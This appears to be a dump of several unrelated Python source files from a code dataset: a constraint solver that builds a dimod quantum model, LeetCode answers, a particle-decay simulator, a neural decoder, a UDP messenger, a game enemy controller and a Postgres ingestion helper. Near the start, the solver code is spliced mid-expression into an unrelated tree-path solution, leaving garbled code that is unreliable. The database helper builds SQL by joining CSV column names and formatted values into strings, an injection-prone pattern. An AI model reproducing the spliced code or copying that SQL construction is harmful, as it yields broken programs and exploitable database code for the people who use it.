RHS[i] in names:\n Rsym = syms[names.index(RHS[i])]\n if i == 0:\n RHSbound[0] = RHSbound[0] + Rsym.bounds[0]\n RHSbound[1] = RHSbound[1] + Rsym.bounds[1]\n else:\n if RHS[i-1] == '-':\n RHSbound[0] = RHSbound[0] - Rsym.bounds[0]\n RHSbound[1] = RHSbound[1] - Rsym.bounds[1]\n if RHS[i-1] == '+':\n RHSbound[0] = RHSbound[0] + Rsym.bounds[0]\n RHSbound[1] = RHSbound[1] + Rsym.bounds[1]\n \n # change this block\n # determine if RHS[i] is a number\n # negative, postive, long, short, whatever\n if len(RHS[i])>1:\n if RHS[i][0] not in alpha and RHS[i][1] in num:\n if i == 0:\n RHSbound[0] = RHSbound[0] + float(RHS[i])\n RHSbound[1] = RHSbound[1] + float(RHS[i])\n else:\n if RHS[i-1] == '-':\n RHSbound[0] = RHSbound[0] - float(RHS[i])\n RHSbound[1] = RHSbound[1] - float(RHS[i])\n if RHS[i-1] == '+':\n RHSbound[0] = RHSbound[0] + float(RHS[i])\n RHSbound[1] = RHSbound[1] + float(RHS[i])\n\n #change this too\n if RHS[i] in num:\n if i == 0:\n RHSbound[0] = RHSbound[0] + float(RHS[i])\n RHSbound[1] = RHSbound[1] + float(RHS[i])\n else:\n if RHS[i-1] == '-':\n RHSbound[0] = RHSbound[0] - float(RHS[i])\n RHSbound[1] = RHSbound[1] - float(RHS[i])\n if RHS[i-1] == '+':\n RHSbound[0] = RHSbound[0] + float(RHS[i])\n RHSbound[1] = RHSbound[1] + float(RHS[i])\n \n\n\n\n if RHSbound[0]>RHSbound[1]:\n temp = RHSbound[0]\n RHSbound[0] = RHSbound[1]\n RHSbound[1] = temp\n\n if RHSbound[0] < -boundmax:\n RHSbound[0] = -boundmax\n if RHSbound[1] > boundmax:\n RHSbound[1] = boundmax\n \n inter = intersection(sym.bounds, RHSbound, 
rel=relation)\n if inter == 'disjoint':\n #print('disjoint bounds:', sym.name, sym.bounds, constraint['relation'], constraint['expression'], RHSbound)\n sym.isdisjointwithsys = True\n return\n\n if inter[1]-inter[0] < sym.bounddist: \n if relation == '=':\n sym.updatebounds(inter[0],inter[1])\n if relation == '<':\n sym.updatebounds(sym.bounds[0],inter[1])\n if relation == '>':\n sym.updatebounds(inter[0], sym.bounds[1])\n \n #print(sym.name, sym.bounds, constraint['relation'], constraint['expression'], RHSbound)\n \n return\n\ndef tighten_bounds(syms):\n newbounds = [[0,0] for x in range(len(syms))]\n oldbounds = [[-boundmax,boundmax] for x in range(len(syms))]\n while not newbounds == oldbounds:\n update_bounds(syms)\n for i in range(len(syms)):\n oldbounds[i] = newbounds[i]\n newbounds[i] = syms[i].bounds\n return\n\ndef find_best_sym(syms):\n bestunknowncount = len(syms)\n bestbounddist = 2*boundmax\n\n symlist = ['']*len(syms)\n for i in range(len(symlist)):\n symlist[i] = syms[i]\n \n bestsym = ''\n\n for sym in syms:\n if sym.isknown == False:\n for constraint in sym.constraints:\n expression = constraint['expression']\n unknowncount = 0\n for Rsym in symlist:\n if Rsym.name in expression:\n if Rsym.isknown == False:\n unknowncount = unknowncount + 1\n #print(sym.name, constraint['relation'], expression, unknowncount) \n if unknowncount <= bestunknowncount and unknowncount > 0:\n if sym.bounddist <= bestbounddist:\n bestsym = sym\n bestbounddist = sym.bounddist\n bestunknowncount = unknowncount\n \n if bestsym == '':\n for sym in syms:\n if sym.isknown == False:\n bestsym = sym\n\n return bestsym\n\ndef pick_value(syms):\n sym = find_best_sym(syms)\n offset = 0.1\n val = round(uniform(sym.bounds[0]+offset,sym.bounds[1]-offset),1)\n sym.updatebounds(val,val)\n \n #print(\"value picked for {}: {}\".format(sym.name,sym.value))\n return\n\ndef determine_symbol_values(syms):\n tighten_bounds(syms)\n system_solved = True\n for sym in syms:\n check = sym.isknown\n if check == False:\n system_solved = False\n\n #print(\"After first bound tightening\\n\\tNew bounds:\")\n #for sym in syms:\n # print(\"\\t\\t\",sym.name, sym.bounds)\n #print(\"\\n\")\n\n while system_solved == False:\n pick_value(syms)\n tighten_bounds(syms)\n #print(\"\\tNew bounds:\")\n #for sym in syms:\n # print(\"\\t\\t\",sym.name, sym.bounds)\n #print(\"\\n\")\n\n system_solved = True\n for sym in syms:\n check = sym.isknown\n if check == False:\n system_solved = False\n \n return syms\n\ndef solve(sys_ineq):\n syms = extract_symbols(sys_ineq)\n #print(\"After symbol initialization\\n\\tBounds:\")\n #for sym in syms:\n # print(\"\\t\\t\",sym.name, sym.bounds)\n #print(\"\\n\")\n\n determine_symbol_values(syms)\n\n return syms\n\ndef evaluate_sys(sys_ineq, syms):\n \n iscorrect = list()\n for ineq in sys_ineq:\n if '=' in ineq:\n relation = '='\n if '>' in ineq:\n relation = '>'\n if '<' in ineq:\n relation = '<'\n\n splitineq = str.split(ineq, relation)\n LHS = splitineq[0]\n RHS = splitineq[1]\n\n Llist = str.split(LHS, ' ')[:-1]\n Rlist = str.split(RHS, ' ')[1:]\n\n knowncount = 0\n for sym in syms:\n if sym.isknown == True:\n knowncount = knowncount + 1\n if knowncount == len(syms):\n allknown = True\n else:\n allknown = False\n\n Lval = 0\n for elem in Llist:\n for sym in syms:\n if elem == sym.name:\n Lval = Lval + sym.value\n if len(elem)>1:\n if elem[0] not in alpha and elem[1] in num:\n Lval = Lval + float(elem)\n\n\n Rval = 0\n for elem in Rlist:\n for sym in syms:\n if elem == sym.name:\n Rval = Rval + 
sym.value\n \n if len(elem)>1:\n if elem[0] not in alpha and elem[1] in num:\n Rval = Rval + float(elem)\n \n\n if relation == '=':\n iscorrect.append({'inequality': ineq, 'valid': round(float(Lval),1) == round(float(Rval),1)})\n if relation == '>':\n iscorrect.append({'inequality': ineq, 'valid': Lval > Rval})\n if relation == '<':\n iscorrect.append({'inequality': ineq, 'valid': Lval < Rval})\n\n \n return iscorrect\n \ndef evaluate_constraints(syms):\n pass\n\n\ndef main():\n \n # XOR encoding (4 bit)\n system_inequalities = ['0 = G',\n 'w0 > G',\n 'w1 > G',\n 'w1 + J01 + w0 > G',\n 'w2 > G',\n 'w2 + J02 + w0 > G',\n 'w2 + J12 + w1 = G',\n 'w2 + J12 + J02 + w1 + J01 + w0 > G',\n 'w3 > G',\n 'w3 + J03 + w0 > G',\n 'w3 + J13 + w1 = G',\n 'w3 + J13 + J03 + w1 + J01 + w0 > G',\n 'w3 + J23 + w2 > G',\n 'w3 + J23 + J03 + w2 + J02 + w0 = G',\n 'w3 + J23 + J13 + w2 + J12 + w1 > G',\n 'w3 + J23 + J13 + J03 + w2 + J12 + J02 + w1 + J01 + w0 > G']\n\n inputs = ['w2','w3']\n outputs = ['w1'] \n \n \n '''\n # XNOR encoding (4 bit)\n system_inequalities = ['0 > G',\n 'w0 > G',\n 'w1 = G',\n 'w1 + J01 + w0 > G',\n 'w2 = G',\n 'w2 + J02 + w0 > G',\n 'w2 + J12 + w1 > G',\n 'w2 + J12 + J02 + w1 + J01 + w0 > G',\n 'w3 = G',\n 'w3 + J03 + w0 > G',\n 'w3 + J13 + w1 > G',\n 'w3 + J13 + J03 + w1 + J01 + w0 > G',\n 'w3 + J23 + w2 > G',\n 'w3 + J23 + J03 + w2 + J02 + w0 > G',\n 'w3 + J23 + J13 + w2 + J12 + w1 > G',\n 'w3 + J23 + J13 + J03 + w2 + J12 + J02 + w1 + J01 + w0 = G',\n 'w3 = -50',\n 'w2 = -50',\n 'w1 = -50',\n 'w0 = 500',\n 'J02 = -300',\n 'J23 = 80',\n 'J12 = 100',\n 'J13 = 100']\n \n inputs = ['w2','w3']\n outputs = ['w1']\n '''\n '''\n #Test toffoli\n system_inequalities = ['w2 = 6313.9',\n 'w1 = 1930.2',\n 'J14 = -1926.5', \n 'J03 = -1503.0', \n 'J01 = 8625.9',\n 'J23 = 14.3',\n 'J04 = -5659.2',\n 'J24 = 1926.5',\n 'J12 = -8244.1',\n 'w4 = 0.0',\n 'J02 = -9566.3',\n 'w0 = 8463.2',\n 'J34 = 10.6',\n 'w3 = 0.0', \n 'J13 = -14.3']\n\n inputs = ['w4','w3','w2']\n outputs = ['w1']\n '''\n############################################\n############################################\n\n besttruecount = 0\n\n stop = False\n count = 0\n while stop == False: \n shuffle(system_inequalities)\n symbols = solve(system_inequalities)\n \n correct = evaluate_sys(system_inequalities, symbols)\n truecount = 0\n falses = list()\n for elem in correct:\n #print(elem['valid'], \"\\t-\", elem['inequality'])\n if elem['valid']==True:\n truecount = truecount + 1\n else:\n falses.append(elem['inequality'])\n #print(\"\\n\")\n\n if truecount >= besttruecount:\n best = list()\n for sym in symbols:\n a = [sym.name, sym.value]\n best.append(a) \n besttruecount = truecount\n #print('best: ', besttruecount)\n bestfalse = falses\n if truecount == len(correct): \n stop = True\n \n count = count + 1\n\n if count % 200 == 0:\n s = input('Tried {} times. Stop? 
(y/n) '.format(count))\n if s == 'y':\n stop = True\n elif s == 'n':\n stop = False\n else:\n stop = False\n print(count)\n \n print(\"\\nSymbol Values: \")\n for entry in best:\n print(\"\\t\",entry[0],\"\\t\",entry[1])\n\n print('{} were true, {} were false:'.format(besttruecount,len(system_inequalities)-besttruecount))\n for i in range(len(bestfalse)):\n print('False: ', bestfalse[i])\n\n import dimod\n\n qubit=list()\n qubitweight =list()\n coupler=list()\n couplerweight=list()\n offset = 0\n \n for sym in symbols:\n if 'w' in sym.name:\n qubit.append(sym.name)\n qubitweight.append(sym.value)\n if 'J' in sym.name:\n numbers = sym.name[1:]\n coupler.append(('w{}'.format(numbers[0]), 'w{}'.format(numbers[1])))\n couplerweight.append(sym.value)\n if sym.name == 'offset':\n offset = sym.value\n\n qubit_weights = {q:w for q,w in zip(qubit, qubitweight)}\n coupler_weights = {c:w for c,w in zip(coupler,couplerweight)}\n\n print(qubit_weights,coupler_weights)\n\n bqm = dimod.BinaryQuadraticModel(qubit_weights, coupler_weights, offset, dimod.BINARY)\n sampler = dimod.ExactSolver()\n response = sampler.sample(bqm)\n\n groundstate = 1000000\n for sample, energy in response.data(['sample','energy']):\n if energy' + i for i in self.binaryTreePaths(root.left)]\n\n if root.right:\n result += [str(root.val) + '->' + i for i in self.binaryTreePaths(root.right)]\n\n if not root.left and not root.right:\n result += [str(root.val)]\n\n return result\n","repo_name":"LYZhelloworld/Leetcode","sub_path":"binary-tree-paths/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13868906549","text":"from .neutrino import Neutrino\nfrom ..particle_masses import *\nfrom ..utils import get_two_body_momenta\nfrom .particle import Particle\nfrom .electron import Electron\nfrom .tau import Tau\nfrom .hnl import HNL\nfrom ..mixing_type import MixingType\nfrom ..utils import get_two_body_momenta\n\nclass DsMeson(Particle):\n def __init__(self, beam=None, parent=None, momenta=[]):\n super().__init__(DS_MASS, beam, parent, momenta)\n\n def __decay_tau_mixing(self, hnl_mass):\n tau = Tau(parent=self, beam=self.beam)\n other_particle = Neutrino(parent=self, beam=self.beam)\n if TAU_MASS + hnl_mass < DS_MASS:\n # HNL mass is small enough to produce an HNL here\n other_particle = HNL(hnl_mass, beam=self.beam, parent=self)\n \n tau_rest_momenta = get_two_body_momenta(self, tau, other_particle, self.beam.num_samples)\n\n tau.set_momenta(tau_rest_momenta).boost(self.momenta)\n\n tau.decay(hnl_mass)\n\n if isinstance(other_particle, HNL):\n hnl_rest_momenta = get_two_body_momenta(self, other_particle, tau, self.beam.num_samples)\n other_particle.set_momenta(hnl_rest_momenta).boost(self.momenta)\n other_particle.decay()\n\n self.children.append(other_particle)\n self.children.append(tau)\n \n\n def __decay_electron_mixing(self, hnl_mass):\n electron = Electron(parent=self, beam=self.beam)\n hnl = HNL(hnl_mass, beam=self.beam, parent=self)\n \n hnl_rest_momenta = get_two_body_momenta(self, hnl, electron, self.beam.num_samples)\n hnl.set_momenta(hnl_rest_momenta).boost(self.momenta)\n hnl.decay()\n\n self.children.append(hnl)\n self.children.append(electron)\n\n def decay(self, hnl_mass):\n # D -> N + lepton (electron, muon, tau)\n if self.beam.mixing_type == MixingType.electron and hnl_mass + ELECTRON_MASS < DS_MASS:\n self.__decay_electron_mixing(hnl_mass)\n elif self.beam.mixing_type == 
MixingType.tau:\n self.__decay_tau_mixing(hnl_mass)\n return self","repo_name":"ryanbarouki/HNL_Dump","sub_path":"src/particles/DsMeson.py","file_name":"DsMeson.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30668080376","text":"import torch\nfrom torch import nn\n\n\nclass SDecoder(nn.Module):\n def __init__(self, colour_channels, code_features, n_filters=32, n_layers=4, kernel_size=3):\n super().__init__()\n\n self.in_conv = nn.Sequential(\n nn.Conv2d(code_features, n_filters, kernel_size, padding=kernel_size // 2, padding_mode='reflect'),\n nn.ReLU())\n\n self.hidden_convs = nn.ModuleList(\n [nn.Conv2d(n_filters, n_filters, kernel_size, padding=kernel_size // 2, padding_mode='reflect'),\n nn.ReLU()] * (n_layers - 2))\n\n self.out_conv = nn.Conv2d(n_filters * 2, colour_channels, kernel_size, padding=kernel_size // 2,\n padding_mode='reflect')\n\n def forward(self, s_code):\n s_code = self.in_conv(s_code)\n skip = s_code\n\n for layer in self.hidden_convs:\n s_code = layer(s_code)\n\n s_code = torch.cat((s_code, skip), dim=1)\n s = self.out_conv(s_code)\n\n return s\n\n def get_s(self, s_code, x):\n s = self.forward(s_code)\n mse = (s - x) ** 2\n return s, mse\n","repo_name":"anonymous-octopus/Unsupervised-Structured-Noise-Removal-with-Variational-Lossy-Autoencoder","sub_path":"decoder/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12735181780","text":"import requests\nimport json\n\ndef searchApi(product):\n\n url = \"https://gnip-api.twitter.com/search/%s/accounts/viralnation/prod/counts.json\" % product\n\n\n headers= {\n \"Content-Type\": \"application/json\",\n }\n\n\n payload = json.dumps({\n \"query\": \"from:sachin_rt\",\n \"fromDate\":\"200603210000\",\n \"bucket\":\"day\"\n })\n\n response = requests.request(\"POST\", url, headers=headers, data = payload, auth=('', ''))\n\n resp = json.loads(response.text)\n print(response.text)\n\n\n\n\n# searchApi(\"30day\")\nsearchApi(\"fullarchive\")\n","repo_name":"AkhilKurian30/Twitter-Stream-Api-Using-AWS-Kinesis","sub_path":"TwitterEngagementsAPI/count-api.py","file_name":"count-api.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9915765880","text":"#Program to encrypt a message by converting all lowercase characters to the next character.\n#BRXCAI001\n#09 MAY 2014\n\nmessage = input(\"Enter a message:\\n\")\n\ndef encrypt(message):\n #Encrypt function only converts lowercase characters so first check to see if it is a lower case.\n if message[0].islower():\n #Only when message is one character. 
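\n # A hypothetical worked example (not from the original author): encrypt(\"abz\") returns \"bca\" - a->b, b->c, and z wraps around to a.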
\n if len(message) == 1:\n #Accommodating for the case when that one character is z, as you cannot encrypt z by shifting: a 27th letter (the ordinal \"27\") does not exist.\n if message[0]== \"z\":\n return \"a\"\n #If the message is one character but that character is not z.\n else:\n #Adding 1 to the ordinal so that the corresponding character is the following alphabetical letter.\n return chr(ord(message[0])+1)\n #When message is more than one character but starts with z.\n elif message[0]== \"z\": \n return \"a\" + encrypt(message[1:])\n #General case when the message is more than one character long and does not start with z.\n else:\n return chr(ord(message[0])+1) + encrypt(message[1:])\n \n #Accommodates characters in the message which are not lowercase.\n else:\n #If the message is only one character long.\n if len(message) == 1: \n return message[0]\n #If the message is more than one character long and starts with a non-lowercase character. \n else: \n return message[0] + encrypt(message[1:])\n \nprint(\"Encrypted message:\\n\", encrypt(message), sep=\"\")","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/brxcai001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3370425664","text":"# -*- coding: utf-8 -*-\nwhile True:\n\tvalue = int(input())\n\tif value == 0:\n\t\tbreak\n\tnumero = 0\n\tfor linha in range(value):\n\t\tfor coluna in range(value):\n\t\t\tif value%2 == 0:\n\t\t\t\tref = 'par'\n\t\t\telse:\n\t\t\t\tref = 'impar'\n\t\t\tepct = value//2\n\t\t\tif linha == coluna:\n\t\t\t\tnumero+=1\n\t\t\tprint('\\t',end=\"\")\n\t\t\tprint(numero,end=\"\")\n\t\tprint('\\n')\n#\tprint('\\n')\n","repo_name":"rfaprofeta/urijudgeonline","sub_path":"uri1431.py","file_name":"uri1431.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31455967983","text":"#!/usr/bin/python3\n\n## This program has two functions:\n## 1) Send message 2) Receive message\n## I wrote this program to understand how UDP sockets work with Python. \n## Two options control the behaviour of this program:\n## 1) -s (sending) 2) -r (receiving message)\n## I also learned how to use the \"argparse\" module. 
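\n##\n## A hypothetical usage sketch (the -s/-r/--ip/--port flags are real and come from the argparse\n## setup below; the host and port values here are placeholder assumptions):\n## terminal 1: python3 udp_messenger.py -r --port 9999\n## terminal 2: python3 udp_messenger.py -s --ip 127.0.0.1 --port 9999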
\n\nimport argparse\nimport socket\nimport sys # needed for sys.exit() in sender(); the original file used sys without importing it\n\n# process options\ndef option():\n parser = argparse.ArgumentParser()\n parser.add_argument('-s',help='Send message',action='store_true')\n parser.add_argument('-r',help='Receive message',action='store_true')\n parser.add_argument('--ip',help='IP address')\n parser.add_argument('--port',help='Port',type=int)\n args=parser.parse_args()\n return args\n\n# send message\ndef sender(ip,port):\n message=input('Message(EXIT to exit): ')\n if message == 'EXIT':\n udp_socket.close() # close the socket before exiting; the original 'udp_socket.close' without parentheses was a no-op\n sys.exit()\n else:\n udp_socket.sendto(message.encode(),(ip, port))\n\n# Message receiver\ndef receiver(port):\n udp_socket.bind(port)\n while True:\n data=udp_socket.recvfrom(4096)\n message=data[0]\n print(message.decode())\n\n\n# Create a Socket\nudp_socket=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# Main\nargs=option()\n\nif args.s:\n ip=args.ip\n port=args.port\n while True:\n sender(ip,port)\n\nif args.r:\n port=args.port\n port=('',port)\n receiver(port)\n\n\n\n \n\n \n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yongtanggit/networking","sub_path":"socket/udp/udp_messenger.py","file_name":"udp_messenger.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71674147009","text":"## @file controller.py\n# @title Enemy\n# @author Alex Lo\n# @date April 06, 2019\n\n\n# Imports\nimport pygame\nimport input\nimport projectile\nimport game\nimport sprite\nimport map\nfrom random import randint\nfrom random import choice\n\nfrom .abstract import *\n# image, hp, speed, damage\n#ENEMYDATA = [image, 3, 3, 0]\n\nSPRITES = ['Food/assets/EnemySprites/Avocado.png',\n 'Food/assets/EnemySprites/Bacon.png',\n 'Food/assets/EnemySprites/Carrot.png',\n 'Food/assets/EnemySprites/Cherry.png',\n 'Food/assets/EnemySprites/Corn.png',\n 'Food/assets/EnemySprites/Dragonfruit.png',\n 'Food/assets/EnemySprites/Egg.png',\n 'Food/assets/EnemySprites/Hamburger.png',\n 'Food/assets/EnemySprites/Orange.png',\n 'Food/assets/EnemySprites/Pancake.png',\n 'Food/assets/EnemySprites/Pizza.png',\n 'Food/assets/EnemySprites/Ramen.png',\n 'Food/assets/EnemySprites/Soda.png',\n 'Food/assets/EnemySprites/Toast.png',\n 'Food/assets/EnemySprites/Tomato.png',\n 'Food/assets/EnemySprites/Watermelon.png']\n\nSTEP = (2048,2048)\nSIZE = (2048,2048)\n\n\nclass EnemyController():\n\n # pass enemy sprite info and attack info as a list.\n def __init__(self, cList):\n\n self.enemies = []\n\n self.sprites = []\n\n for sheet in SPRITES:\n temp = sprite.extractSprites(sheet, SIZE, STEP)\n self.sprites.append(pygame.transform.scale(temp[0],(64,64)))\n\n\n self.data = [[1, 2, 1],\n [2, 3, 2],\n [3, 4, 2]]\n\n\n #set collision list\n self.cList = cList\n\n\n def spawnEnemies(self, sc, level):\n\n for i in range(randint(1 * (level+1), 5 * (level+1))):\n self.enemies.append(Enemy(choice(self.sprites),\n self.data[level],\n (randint(130,1000), randint(130,800))))\n self.renderEnemies(sc)\n\n def killall(self, sc):\n for enemy in self.enemies:\n sc.remove(enemy)\n enemy.kill()\n\n def renderEnemies(self,sc):\n for enemy in self.enemies:\n sc.add(enemy)\n\n def setEnemyPosition(self, enemy, x, y): # parameter renamed from 'Enemy': the body always referenced lowercase 'enemy'\n enemy.rect.x = x\n enemy.rect.y = y\n\n\n################################################################################\n# Movement #\n################################################################################\n\n\n def moveX(self, enemy, speedX):\n enemy.rect.x += speedX\n\n\n def moveY(self, enemy, 
speedY):\n enemy.rect.y += speedY\n\n\n\n###############################################################################\n# Collision Rules #\n###############################################################################\n\n def checkCollision(self, enemy):\n\n collisions = pygame.sprite.spritecollide(enemy, self.cList, False)\n\n for i in collisions:\n\n if (i.id == game.ID.WALL or i.id == game.ID.STRUCTURE):\n self.collideWall(enemy,i)\n\n\n def collideWall(self, enemy, wall):\n\n if (enemy.oldx + enemy.rect.width <= wall.rect.x):\n enemy.rect.x = wall.rect.x - enemy.rect.width\n\n elif (enemy.oldx >= wall.rect.x + wall.rect.width):\n enemy.rect.x = wall.rect.x + wall.rect.width\n\n elif (enemy.oldy + enemy.rect.height <= wall.rect.y):\n enemy.rect.y = wall.rect.y - enemy.rect.height\n\n elif (enemy.oldy >= wall.rect.y + wall.rect.height):\n enemy.rect.y = wall.rect.y + wall.rect.height\n\n\n def moveToPlayer(self, player, enemy):\n\n xDiff = player.pos[0] - enemy.rect.x\n yDiff = player.pos[1] - enemy.rect.y\n enSpeed = enemy.speed\n\n if (xDiff > enSpeed):\n self.moveX(enemy,enSpeed)\n\n elif (xDiff < -enSpeed):\n self.moveX(enemy,-enSpeed)\n\n elif (abs(xDiff) <= enSpeed):\n self.moveX(enemy,xDiff)\n\n if (yDiff > enSpeed):\n self.moveY(enemy,enSpeed)\n\n elif (yDiff < -enSpeed):\n self.moveY(enemy,-enSpeed)\n\n elif (abs(yDiff) <= enSpeed):\n self.moveY(enemy,yDiff)\n\n def update(self, player, sc, ic):\n\n for enemy in self.enemies:\n\n enemy.oldx = enemy.rect.x\n enemy.oldy = enemy.rect.y\n\n self.moveToPlayer(player, enemy)\n\n self.checkCollision(enemy)\n\n if enemy.hp <= 0:\n enemy.kill()\n self.enemies.remove(enemy)\n ic.spawnItem(sc, enemy.oldx, enemy.oldy)\n\n enemy.frame += 1\n","repo_name":"Babarbitz/Project-Food","sub_path":"Food/src/enemy/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10923547650","text":"import os\nimport datetime\nimport requests \nimport csv\nimport psycopg2\n\nclass DB(object):\n\n def __init__(self):\n self.connstr = os.environ.get('ingressconnectionstring', None)\n\n\n def get_connection(self):\n if self.connstr:\n return psycopg2.connect(self.connstr)\n else:\n return psycopg2.connect(\n dbname='ingress',\n user='cameron',\n password=''\n )\n\n\n def insert_rows(self, file_object, table_name):\n\n conn = None\n copy_statement = \"\"\"\n COPY %s FROM STDIN WITH\n CSV\n HEADER\n DELIMITER AS ','\n \"\"\"\n\n try:\n conn = self.get_connection()\n cur = conn.cursor()\n\n print(\"Copying data into\", table_name)\n cur.copy_expert(sql=copy_statement % table_name, file=file_object)\n\n conn.commit()\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n\n\n def execute_sql(self, sql, params=None):\n # print(\"Executing sql:\", sql)\n try:\n conn = self.get_connection()\n cur = conn.cursor()\n sql_args = list(filter(lambda v: v is not None, [sql, params]))\n # print(\"SQL_ARGS:\", sql_args)\n cur.execute(*sql_args)\n conn.commit()\n rows = []\n if cur.description != None:\n rows = cur.fetchall()\n cur.close()\n return rows\n except (Exception, psycopg2.DatabaseError) as error:\n if str(error) != 'no results to fetch':\n print(\"SQL Error >>\", error)\n raise Exception('SQL error {}'.format(error)) \n finally:\n if conn and conn is not None:\n conn.close()\n\n\n def create_table(self, csv_record, columns):\n table_name = '_' + 
str(datetime.datetime.now())\n \n table_name = table_name.replace('-', '_') \\\n .replace(' ', '_at_') \\\n .replace(':', '_') \\\n .replace('.', '_')\n\n print(\"Creating table:\", table_name)\n sql = 'create table if not exists ' + table_name + \" (\" + \" VARCHAR(400),\".join(columns) + \" VARCHAR(400))\"\n rows = self.execute_sql(sql)\n\n return table_name\n\n\n def check_url(self, url):\n result = self.execute_sql(\"\"\"select id from tables_index where csv_url = %s\"\"\", [url])\n print(\"URL Lookup:\", result, url)\n if len(result) > 0:\n return False\n else:\n return True\n\n\n def get_next_record(self):\n sql = '''\n update tables_index\n set \n state = 1, parsed_at = '{}'\n where \n id = (\n select id from tables_index\n where state = 0 \n order by inserted_at asc\n limit 1\n )\n returning id, csv_url, parse_attempts\n '''.format(datetime.datetime.now())\n\n resp = self.execute_sql(sql)\n if resp:\n return dict( zip(('id', 'csv_url', 'parse_attempts'), resp.pop()))\n else:\n return False\n\n\n def parse_failed(self, record):\n print(\"Parsing failed for:\", record)\n sql = '''\n update tables_index\n set \n state = 3, failed_at = '{}', parse_attempts = {}\n where \n id = {}\n '''.format(datetime.datetime.now(), record['parse_attempts'] + 1, record['id'])\n\n self.execute_sql(sql)\n\n\n def parse_succeeded(self, record):\n print(\"Parsing succeeded for:\", record)\n sql = '''\n update tables_index\n set \n state = 2, succeeded_at = '{}', parse_attempts = {}\n where \n id = {}\n '''.format(datetime.datetime.now(), record['parse_attempts'] + 1, record['id'])\n\n self.execute_sql(sql)\n\n\n def set_table_name(self, record, table_name):\n sql = '''\n update tables_index\n set \n table_name = '{}'\n where \n id = {}\n '''.format(table_name, record['id'])\n\n self.execute_sql(sql)\n","repo_name":"zachChilders/deanonymization","sub_path":"ingress/app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"25335106895","text":"\ndef check(a, b, c):\n if a * a + b * b == c * c:\n return True\n else:\n return False\ntot = 1000\nfor a in range(1, 1000):\n for b in range(a + 1, 1000):\n #because we know a + b + c = 1000\n c = tot - a - b \n if check(a, b, c) == True:\n print(a * b * c)\n break\n \n \n\n \n","repo_name":"jacksonliao78/projecteuler","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22159492037","text":"def ViewMenu():\n print(\"\\n==========Выберете операцию=============\\n\"\n \"1. Просмотреть заметки\\n\"\n \"2. Создать заметки\\n\"\n \"3. Выйти\")\n num = int(input(\"Выберите пункт меню: \"))\n return num\n\ndef ViewWrite():\n print(\"\\n==========Выберете операцию=============\\n\"\n \"1. Сохранить в файл и выйти \\n\"\n \"2. Продолжить работу с заметками\\n\"\n \"3. Выйти без сохранения\")\n num = int(input(\"Выберите пункт меню: \"))\n return num\n\ndef WorkMenu():\n print(\"\\n==========Введите операцию=============\\n\"\n \"1. Добавить запись\\n\"\n \"2. Редактировать запись\\n\"\n \"3. Удалить запись\\n\"\n \"4. Вывести все запись\\n\"\n \"5. 
Выйти\")\n \n key = int(input(\"Выберите пункт меню: \"))\n return key\n","repo_name":"ColdSun93/Control_work_specialization","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36283944978","text":"class Solution:\n\tdef asteroidCollision(self, asteroids: List[int]) -> List[int]:\n\t\t\"\"\"\n\t\tWe can solve this problem using a stack. We iterate through the asteroids from left to right, and for each asteroid, we perform the following steps:\n\t\t1. If the asteroid is moving to the right (i.e., positive), we simply append it to the stack since it cannot collide with any previous asteroid.\n\t\t2. If the asteroid is moving to the left (i.e., negative), we need to compare it with the top of the stack to see if they will collide. We keep popping elements from the stack until one of the following conditions is met:\n\t\t- The stack is empty, in which case the current asteroid survives since there is no asteroid to collide with.\n\t\t- The top of the stack is negative, in which case the current asteroid survives since it is moving to the left and cannot collide with any previous asteroid.\n\t\t- The top of the stack is positive and has a larger size than the current asteroid, in which case the current asteroid is destroyed since it is smaller and moving to the left.\n\t\t- The top of the stack is positive and has a smaller or equal size than the current asteroid, in which case both asteroids are destroyed since they have the same size or the current asteroid is larger and destroys the previous asteroid.\n\t\t3. After all the asteroids have been processed, the stack will contain the surviving asteroids. We can return the stack as the final result\n\t\t\"\"\"\n\t\tstack = []\n\t\tfor asteroid in asteroids:\n\t\t\tif asteroid > 0:\n\t\t\t\tstack.append(asteroid)\n\t\t\telse: # when we have a negative asteroid\n\t\t\t\twhile stack and stack[-1] > 0 and stack[-1] < abs(asteroid):\n\t\t\t\t\tstack.pop()\n\t\t\t\tif not stack or stack[-1] < 0:\n\t\t\t\t\tstack.append(asteroid)\n\t\t\t\telif stack[-1] == abs(asteroid):\n\t\t\t\t\tstack.pop()\n\n\t\treturn stack\n# time: O(n) = space, n is length of arr\n","repo_name":"tramnhatquang/LeetCode-Solutions-Python","sub_path":"735. Asteroid Collision.py","file_name":"735. 
